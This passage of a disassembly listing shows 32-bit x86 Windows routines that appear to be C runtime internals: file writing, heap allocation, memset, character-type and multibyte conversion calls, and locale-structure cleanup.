jb short loc_41BDE7
jmp short loc_41BE6D
; ---------------------------------------------------------------------------
loc_41BE62: ; CODE XREF: sub_41BD6B+DC�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
loc_41BE6B: ; CODE XREF: sub_41BD6B+E6�j
xor edi, edi
loc_41BE6D: ; CODE XREF: sub_41BD6B+F5�j
; sub_41BD6B+14E�j ...
mov eax, [ebp+var_14]
cmp eax, edi
jnz loc_41BEFD
cmp [ebp+var_8], edi
jz short loc_41BED4
push 5
pop esi
cmp [ebp+var_8], esi
jnz short loc_41BEC6
call sub_419430
mov dword ptr [eax], 9
call sub_419439
mov [eax], esi
jmp short loc_41BECF
; ---------------------------------------------------------------------------
loc_41BE99: ; CODE XREF: sub_41BD6B+64�j
push edi
lea ecx, [ebp+var_1C]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_420040 ; WriteFile
test eax, eax
jz short loc_41BEBB
mov eax, [ebp+var_1C]
mov [ebp+var_8], edi
mov [ebp+var_14], eax
jmp short loc_41BE6D
; ---------------------------------------------------------------------------
loc_41BEBB: ; CODE XREF: sub_41BD6B+143�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
jmp short loc_41BE6D
; ---------------------------------------------------------------------------
loc_41BEC6: ; CODE XREF: sub_41BD6B+118�j
push [ebp+var_8]
call sub_419442
pop ecx
loc_41BECF: ; CODE XREF: sub_41BD6B+12C�j
; sub_41BD6B+190�j
or eax, 0FFFFFFFFh
jmp short loc_41BF00
; ---------------------------------------------------------------------------
loc_41BED4: ; CODE XREF: sub_41BD6B+76�j
; sub_41BD6B+110�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41BEE9
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jnz short loc_41BEE9
xor eax, eax
jmp short loc_41BF00
; ---------------------------------------------------------------------------
loc_41BEE9: ; CODE XREF: sub_41BD6B+170�j
; sub_41BD6B+178�j
call sub_419430
mov dword ptr [eax], 1Ch
call sub_419439
mov [eax], edi
jmp short loc_41BECF
; ---------------------------------------------------------------------------
loc_41BEFD: ; CODE XREF: sub_41BD6B+107�j
sub eax, [ebp+var_18]
loc_41BF00: ; CODE XREF: sub_41BD6B+167�j
; sub_41BD6B+17C�j
pop esi
pop ebx
loc_41BF02: ; CODE XREF: sub_41BD6B+24�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
call sub_41A026
leave
retn
sub_41BD6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF10 proc near ; CODE XREF: sub_4162EB+98�p
; sub_4162EB+EB�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041BF9F SIZE 0000001C BYTES
push 0Ch
push offset stru_429900
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C638
jnb short loc_41BF9F
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41BF9F
push ebx
call sub_41CB8C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41BF6F
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41BD6B
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41BF86
; ---------------------------------------------------------------------------
loc_41BF6F: ; CODE XREF: sub_41BF10+49�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41BF86: ; CODE XREF: sub_41BF10+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41BF97
mov eax, [ebp+var_1C]
jmp short loc_41BFB5
sub_41BF10 endp
; =============== S U B R O U T I N E =======================================
sub_41BF94 proc near ; DATA XREF: .rdata:stru_429900�o
mov ebx, [ebp+8]
sub_41BF94 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41BF97 proc near ; CODE XREF: sub_41BF10+7A�p
push ebx
call sub_41CBFF
pop ecx
retn
sub_41BF97 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41BF10
loc_41BF9F: ; CODE XREF: sub_41BF10+15�j
; sub_41BF10+35�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41BFB5: ; CODE XREF: sub_41BF10+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41BF10
; =============== S U B R O U T I N E =======================================
sub_41BFBB proc near ; CODE XREF: sub_4162EB+6F�p
; sub_418C09+34�p ...
arg_0 = dword ptr 4
inc dword_47C220
push 1000h
call sub_414CAD
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_41BFE4
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41BFF5
; ---------------------------------------------------------------------------
loc_41BFE4: ; CODE XREF: sub_41BFBB+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41BFF5: ; CODE XREF: sub_41BFBB+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41BFBB endp
; =============== S U B R O U T I N E =======================================
sub_41BFFF proc near ; CODE XREF: sub_4162EB+64�p
; sub_41A95C+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_47C638
jb short loc_41C00E
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C00E: ; CODE XREF: sub_41BFFF+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C640[ecx*4]
lea eax, [eax+eax*8]
movsx eax, byte ptr [ecx+eax*4+4]
and eax, 40h
retn
sub_41BFFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C029 proc near ; CODE XREF: sub_41C089+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_41C03A
xor eax, eax
jmp short loc_41C086
; ---------------------------------------------------------------------------
loc_41C03A: ; CODE XREF: sub_41C029+B�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_41C053
mov ax, [ebp+arg_8]
cmp ax, 0FFh
ja short loc_41C078
mov [ecx], al
xor eax, eax
inc eax
jmp short loc_41C086
; ---------------------------------------------------------------------------
loc_41C053: ; CODE XREF: sub_41C029+17�j
lea edx, [ebp+arg_4]
push edx
push esi
push dword ptr [eax+28h]
mov [ebp+arg_4], esi
push ecx
push 1
lea ecx, [ebp+arg_8]
push ecx
push esi
push dword ptr [eax+4]
call ds:dword_4200D8 ; WideCharToMultiByte
cmp eax, esi
jz short loc_41C078
cmp [ebp+arg_4], esi
jz short loc_41C086
loc_41C078: ; CODE XREF: sub_41C029+21�j
; sub_41C029+48�j
call sub_419430
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_41C086: ; CODE XREF: sub_41C029+F�j
; sub_41C029+28�j ...
pop esi
pop ebp
retn
sub_41C029 endp
; =============== S U B R O U T I N E =======================================
sub_41C089 proc near ; CODE XREF: sub_416492+317�p
; sub_416492+6F7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_416C45
mov eax, [eax+64h]
cmp eax, off_42D84C
jz short loc_41C09E
call sub_417A7E
loc_41C09E: ; CODE XREF: sub_41C089+E�j
push [esp+arg_4]
push [esp+4+arg_0]
push eax
call sub_41C029
add esp, 0Ch
retn
sub_41C089 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0B0 proc near ; CODE XREF: sub_416C45+23�p
; sub_416CB6+29�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041C163 SIZE 00000008 BYTES
push 10h
push offset stru_429910
call __SEH_prolog
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+var_1C], esi
test esi, esi
jnz short loc_41C0CB
inc esi
loc_41C0CB: ; CODE XREF: sub_41C0B0+18�j
; sub_41C0B0+9F�j
xor edi, edi
mov [ebp+var_20], edi
cmp esi, 0FFFFFFE0h
ja short loc_41C13A
cmp dword_47C9A0, 3
jnz short loc_41C125
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov ebx, [ebp+var_1C]
cmp ebx, dword_47C98C
ja short loc_41C125
push 4
call sub_4180B5
pop ecx
and [ebp+ms_exc.disabled], edi
push ebx
call sub_41890D
pop ecx
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C15A
mov edi, [ebp+var_20]
test edi, edi
jz short loc_41C129
push [ebp+var_1C]
push 0
push edi
call sub_41C380
add esp, 0Ch
loc_41C125: ; CODE XREF: sub_41C0B0+2C�j
; sub_41C0B0+40�j
test edi, edi
jnz short loc_41C163
loc_41C129: ; CODE XREF: sub_41C0B0+65�j
push esi
push 8
push dword_47C99C
call ds:dword_42005C ; RtlAllocateHeap
mov edi, eax
loc_41C13A: ; CODE XREF: sub_41C0B0+23�j
test edi, edi
jnz short loc_41C163
cmp dword_47C37C, edi
jz short loc_41C163
push esi
call sub_4192AD
pop ecx
test eax, eax
jnz loc_41C0CB
jmp short loc_41C165
sub_41C0B0 endp
; =============== S U B R O U T I N E =======================================
sub_41C157 proc near ; DATA XREF: .rdata:stru_429910�o
mov esi, [ebp+0Ch]
sub_41C157 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C15A proc near ; CODE XREF: sub_41C0B0+5B�p
push 4
call sub_418021
pop ecx
retn
sub_41C15A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C0B0
loc_41C163: ; CODE XREF: sub_41C0B0+77�j
; sub_41C0B0+8C�j ...
mov eax, edi
loc_41C165: ; CODE XREF: sub_41C0B0+A5�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41C0B0
; =============== S U B R O U T I N E =======================================
sub_41C16B proc near ; CODE XREF: sub_416D3B+CF�p
; sub_416D3B+301�p ...
arg_0 = dword ptr 4
call sub_416C45
mov eax, [eax+64h]
cmp eax, off_42D84C
jz short loc_41C180
call sub_417A7E
loc_41C180: ; CODE XREF: sub_41C16B+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41C196
push 4
push [esp+4+arg_0]
push eax
call sub_41787B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41C196: ; CODE XREF: sub_41C16B+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
retn
sub_41C16B endp
; =============== S U B R O U T I N E =======================================
sub_41C1A5 proc near ; CODE XREF: sub_416D3B+840�p
; sub_416D3B+922�p
arg_0 = dword ptr 4
call sub_416C45
mov eax, [eax+64h]
cmp eax, off_42D84C
jz short loc_41C1BA
call sub_417A7E
loc_41C1BA: ; CODE XREF: sub_41C1A5+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41C1D3
push 80h
push [esp+4+arg_0]
push eax
call sub_41787B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41C1D3: ; CODE XREF: sub_41C1A5+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
retn
sub_41C1A5 endp
; =============== S U B R O U T I N E =======================================
sub_41C1E4 proc near ; CODE XREF: sub_416D3B+3F�p
; sub_416D3B+5A�p ...
arg_0 = dword ptr 4
call sub_416C45
mov eax, [eax+64h]
cmp eax, off_42D84C
jz short loc_41C1F9
call sub_417A7E
loc_41C1F9: ; CODE XREF: sub_41C1E4+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41C20F
push 8
push [esp+4+arg_0]
push eax
call sub_41787B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41C20F: ; CODE XREF: sub_41C1E4+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
retn
sub_41C1E4 endp
; =============== S U B R O U T I N E =======================================
sub_41C21E proc near ; CODE XREF: sub_416D3B+6D�p
; sub_416D3B+3DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41C26A
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41C23C
test al, al
jns short loc_41C26A
test al, 2
jnz short loc_41C26A
loc_41C23C: ; CODE XREF: sub_41C21E+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41C249
push esi
call sub_41BFBB
pop ecx
loc_41C249: ; CODE XREF: sub_41C21E+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41C259
cmp dword ptr [esi+4], 0
jnz short loc_41C26A
inc eax
mov [esi], eax
loc_41C259: ; CODE XREF: sub_41C21E+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_41C270
cmp [eax], bl
jz short loc_41C272
inc eax
mov [esi], eax
loc_41C26A: ; CODE XREF: sub_41C21E+9�j
; sub_41C21E+18�j ...
or eax, 0FFFFFFFFh
loc_41C26D: ; CODE XREF: sub_41C21E+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41C270: ; CODE XREF: sub_41C21E+43�j
mov [eax], bl
loc_41C272: ; CODE XREF: sub_41C21E+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41C26D
sub_41C21E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C28A proc near ; CODE XREF: sub_41C34A+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_41C2AE
cmp [ebp+arg_C], ebx
jz short loc_41C2AE
mov al, [edi]
cmp al, bl
jnz short loc_41C2B5
mov eax, [ebp+arg_4]
cmp eax, ebx
jz short loc_41C2AE
mov [eax], bx
loc_41C2AE: ; CODE XREF: sub_41C28A+D�j
; sub_41C28A+12�j ...
xor eax, eax
loc_41C2B0: ; CODE XREF: sub_41C28A+44�j
; sub_41C28A+8D�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C2B5: ; CODE XREF: sub_41C28A+18�j
mov esi, [ebp+arg_0]
cmp [esi+14h], ebx
jnz short loc_41C2D0
mov ecx, [ebp+arg_4]
cmp ecx, ebx
jz short loc_41C2CB
movzx ax, al
mov [ecx], ax
loc_41C2CB: ; CODE XREF: sub_41C28A+38�j
; sub_41C28A+AB�j
xor eax, eax
inc eax
jmp short loc_41C2B0
; ---------------------------------------------------------------------------
loc_41C2D0: ; CODE XREF: sub_41C28A+31�j
mov ecx, [esi+48h]
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41C319
mov eax, [esi+28h]
cmp eax, 1
jle short loc_41C307
cmp [ebp+arg_C], eax
jl short loc_41C307
xor ecx, ecx
cmp [ebp+arg_4], ebx
setnz cl
push ecx
push [ebp+arg_4]
push eax
push edi
push 9
push dword ptr [esi+4]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41C314
loc_41C307: ; CODE XREF: sub_41C28A+59�j
; sub_41C28A+5E�j
mov eax, [ebp+arg_C]
cmp eax, [esi+28h]
jb short loc_41C337
cmp [edi+1], bl
jz short loc_41C337
loc_41C314: ; CODE XREF: sub_41C28A+7B�j
mov eax, [esi+28h]
jmp short loc_41C2B0
; ---------------------------------------------------------------------------
loc_41C319: ; CODE XREF: sub_41C28A+51�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
push eax
push [ebp+arg_4]
push 1
push edi
push 9
push dword ptr [esi+4]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41C2CB
loc_41C337: ; CODE XREF: sub_41C28A+83�j
; sub_41C28A+88�j
call sub_419430
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_41C2B0
sub_41C28A endp
; =============== S U B R O U T I N E =======================================
sub_41C34A proc near ; CODE XREF: sub_416D3B+68F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_416C45
mov eax, [eax+64h]
cmp eax, off_42D84C
jz short loc_41C35F
call sub_417A7E
loc_41C35F: ; CODE XREF: sub_41C34A+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_41C28A
add esp, 10h
retn
sub_41C34A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C380 proc near ; CODE XREF: sub_416D3B+512�p
; sub_4197F5+8C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41C3DB
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41C3CB
neg ecx
and ecx, 3
jz short loc_41C3AD
sub edx, ecx
loc_41C3A3: ; CODE XREF: sub_41C380+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_41C3A3
loc_41C3AD: ; CODE XREF: sub_41C380+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41C3CB
rep stosd
test edx, edx
jz short loc_41C3D5
loc_41C3CB: ; CODE XREF: sub_41C380+18�j
; sub_41C380+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_41C3CB
loc_41C3D5: ; CODE XREF: sub_41C380+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C3DB: ; CODE XREF: sub_41C380+A�j
mov eax, [esp+arg_0]
retn
sub_41C380 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C3E0 proc near ; CODE XREF: sub_41787B+60�p
; sub_41AA66+A4�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_429920
call __SEH_prolog
xor esi, esi
cmp dword_47C4A4, esi
jnz short loc_41C42B
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_429080
push edi
call ds:dword_420154 ; GetStringTypeW
test eax, eax
jz short loc_41C416
mov dword_47C4A4, edi
jmp short loc_41C42B
; ---------------------------------------------------------------------------
loc_41C416: ; CODE XREF: sub_41C3E0+2C�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41C42B
mov dword_47C4A4, 2
loc_41C42B: ; CODE XREF: sub_41C3E0+14�j
; sub_41C3E0+34�j ...
mov eax, dword_47C4A4
cmp eax, 2
jz loc_41C523
cmp eax, esi
jz loc_41C523
cmp eax, 1
jnz loc_41C549
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_10], esi
jnz short loc_41C45D
mov eax, dword_47C4F0
mov [ebp+arg_10], eax
loc_41C45D: ; CODE XREF: sub_41C3E0+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call ds:dword_4200D4 ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_41C549
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_41C380
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C4CE
; ---------------------------------------------------------------------------
loc_41C4B9: ; DATA XREF: .rdata:stru_429920�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41C4BD: ; DATA XREF: .rdata:stru_429920�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_41C4CE: ; CODE XREF: sub_41C3E0+D7�j
test esi, esi
jnz short loc_41C4E9
push edi
push 2
call sub_41C0B0
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_41C549
mov [ebp+var_24], 1
loc_41C4E9: ; CODE XREF: sub_41C3E0+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jz short loc_41C511
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_420154 ; GetStringTypeW
mov [ebp+var_20], eax
loc_41C511: ; CODE XREF: sub_41C3E0+11E�j
cmp [ebp+var_24], 0
jz short loc_41C51E
push esi
call sub_414844
pop ecx
loc_41C51E: ; CODE XREF: sub_41C3E0+135�j
mov eax, [ebp+var_20]
jmp short loc_41C591
; ---------------------------------------------------------------------------
loc_41C523: ; CODE XREF: sub_41C3E0+53�j
; sub_41C3E0+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_41C530
mov ebx, dword_47C4E0
loc_41C530: ; CODE XREF: sub_41C3E0+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_41C53D
mov edi, dword_47C4F0
loc_41C53D: ; CODE XREF: sub_41C3E0+155�j
push ebx
call sub_41DD87
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41C54D
loc_41C549: ; CODE XREF: sub_41C3E0+64�j
; sub_41C3E0+A5�j ...
xor eax, eax
jmp short loc_41C591
; ---------------------------------------------------------------------------
loc_41C54D: ; CODE XREF: sub_41C3E0+167�j
cmp eax, edi
jz short loc_41C56F
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_41DDD0
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_41C549
mov [ebp+arg_4], esi
loc_41C56F: ; CODE XREF: sub_41C3E0+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call ds:dword_4201D4 ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_41C58F
push esi
call sub_414844
pop ecx
loc_41C58F: ; CODE XREF: sub_41C3E0+1A6�j
mov eax, edi
loc_41C591: ; CODE XREF: sub_41C3E0+141�j
; sub_41C3E0+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_41C3E0 endp
; =============== S U B R O U T I N E =======================================
sub_41C59A proc near ; CODE XREF: sub_4178F2+B1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41C728
push dword ptr [esi+4]
call sub_414844
push dword ptr [esi+8]
call sub_414844
push dword ptr [esi+0Ch]
call sub_414844
push dword ptr [esi+10h]
call sub_414844
push dword ptr [esi+14h]
call sub_414844
push dword ptr [esi+18h]
call sub_414844
push dword ptr [esi]
call sub_414844
push dword ptr [esi+20h]
call sub_414844
push dword ptr [esi+24h]
call sub_414844
push dword ptr [esi+28h]
call sub_414844
push dword ptr [esi+2Ch]
call sub_414844
push dword ptr [esi+30h]
call sub_414844
push dword ptr [esi+34h]
call sub_414844
push dword ptr [esi+1Ch]
call sub_414844
push dword ptr [esi+38h]
call sub_414844
push dword ptr [esi+3Ch]
call sub_414844
add esp, 40h
push dword ptr [esi+40h]
call sub_414844
push dword ptr [esi+44h]
call sub_414844
push dword ptr [esi+48h]
call sub_414844
push dword ptr [esi+4Ch]
call sub_414844
push dword ptr [esi+50h]
call sub_414844
push dword ptr [esi+54h]
call sub_414844
push dword ptr [esi+58h]
call sub_414844
push dword ptr [esi+5Ch]
call sub_414844
push dword ptr [esi+60h]
call sub_414844
push dword ptr [esi+64h]
call sub_414844
push dword ptr [esi+68h]
call sub_414844
push dword ptr [esi+6Ch]
call sub_414844
push dword ptr [esi+70h]
call sub_414844
push dword ptr [esi+74h]
call sub_414844
push dword ptr [esi+78h]
call sub_414844
push dword ptr [esi+7Ch]
call sub_414844
add esp, 40h
push dword ptr [esi+80h]
call sub_414844
push dword ptr [esi+84h]
call sub_414844
push dword ptr [esi+88h]
call sub_414844
push dword ptr [esi+8Ch]
call sub_414844
push dword ptr [esi+90h]
call sub_414844
push dword ptr [esi+94h]
call sub_414844
push dword ptr [esi+98h]
call sub_414844
push dword ptr [esi+9Ch]
call sub_414844
push dword ptr [esi+0A0h]
call sub_414844
push dword ptr [esi+0A4h]
call sub_414844
push dword ptr [esi+0A8h]
call sub_414844
add esp, 2Ch
loc_41C728: ; CODE XREF: sub_41C59A+7�j
pop esi
retn
sub_41C59A endp
; =============== S U B R O U T I N E =======================================
sub_41C72A proc near ; CODE XREF: sub_4178F2+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41C787
mov eax, [esi]
mov ecx, off_42E204
cmp eax, [ecx]
jz short loc_41C74E
cmp eax, off_42E1D4
jz short loc_41C74E
push eax
call sub_414844
pop ecx
loc_41C74E: ; CODE XREF: sub_41C72A+13�j
; sub_41C72A+1B�j
mov eax, [esi+4]
mov ecx, off_42E204
cmp eax, [ecx+4]
jz short loc_41C76B
cmp eax, off_42E1D8
jz short loc_41C76B
push eax
call sub_414844
pop ecx
loc_41C76B: ; CODE XREF: sub_41C72A+30�j
; sub_41C72A+38�j
mov esi, [esi+8]
mov eax, off_42E204
cmp esi, [eax+8]
jz short loc_41C787
cmp esi, off_42E1DC
jz short loc_41C787
push esi
call sub_414844
pop ecx
loc_41C787: ; CODE XREF: sub_41C72A+7�j
; sub_41C72A+4C�j ...
pop esi
retn
sub_41C72A endp
; =============== S U B R O U T I N E =======================================
sub_41C789 proc near ; CODE XREF: sub_4178F2+3A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41C860
mov eax, [esi+0Ch]
mov ecx, off_42E204
cmp eax, [ecx+0Ch]
jz short loc_41C7B3
cmp eax, off_42E1E0
jz short loc_41C7B3
push eax
call sub_414844
pop ecx
loc_41C7B3: ; CODE XREF: sub_41C789+19�j
; sub_41C789+21�j
mov eax, [esi+10h]
mov ecx, off_42E204
cmp eax, [ecx+10h]
jz short loc_41C7D0
cmp eax, off_42E1E4
jz short loc_41C7D0
push eax
call sub_414844
pop ecx
loc_41C7D0: ; CODE XREF: sub_41C789+36�j
; sub_41C789+3E�j
mov eax, [esi+14h]
mov ecx, off_42E204
cmp eax, [ecx+14h]
jz short loc_41C7ED
cmp eax, off_42E1E8
jz short loc_41C7ED
push eax
call sub_414844
pop ecx
loc_41C7ED: ; CODE XREF: sub_41C789+53�j
; sub_41C789+5B�j
mov eax, [esi+18h]
mov ecx, off_42E204
cmp eax, [ecx+18h]
jz short loc_41C80A
cmp eax, off_42E1EC
jz short loc_41C80A
push eax
call sub_414844
pop ecx
loc_41C80A: ; CODE XREF: sub_41C789+70�j
; sub_41C789+78�j
mov eax, [esi+1Ch]
mov ecx, off_42E204
cmp eax, [ecx+1Ch]
jz short loc_41C827
cmp eax, off_42E1F0
jz short loc_41C827
push eax
call sub_414844
pop ecx
loc_41C827: ; CODE XREF: sub_41C789+8D�j
; sub_41C789+95�j
mov eax, [esi+20h]
mov ecx, off_42E204
cmp eax, [ecx+20h]
jz short loc_41C844
cmp eax, off_42E1F4
jz short loc_41C844
push eax
call sub_414844
pop ecx
loc_41C844: ; CODE XREF: sub_41C789+AA�j
; sub_41C789+B2�j
mov esi, [esi+24h]
mov eax, off_42E204
cmp esi, [eax+24h]
jz short loc_41C860
cmp esi, off_42E1F8
jz short loc_41C860
push esi
call sub_414844
pop ecx
loc_41C860: ; CODE XREF: sub_41C789+7�j
; sub_41C789+C6�j ...
pop esi
retn
sub_41C789 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41C884: ; CODE XREF: .text:0041C891�j
mov al, [edx]
or al, al
jz short loc_41C893
add edx, 1
bts [esp], eax
jmp short loc_41C884
; ---------------------------------------------------------------------------
loc_41C893: ; CODE XREF: .text:0041C888�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
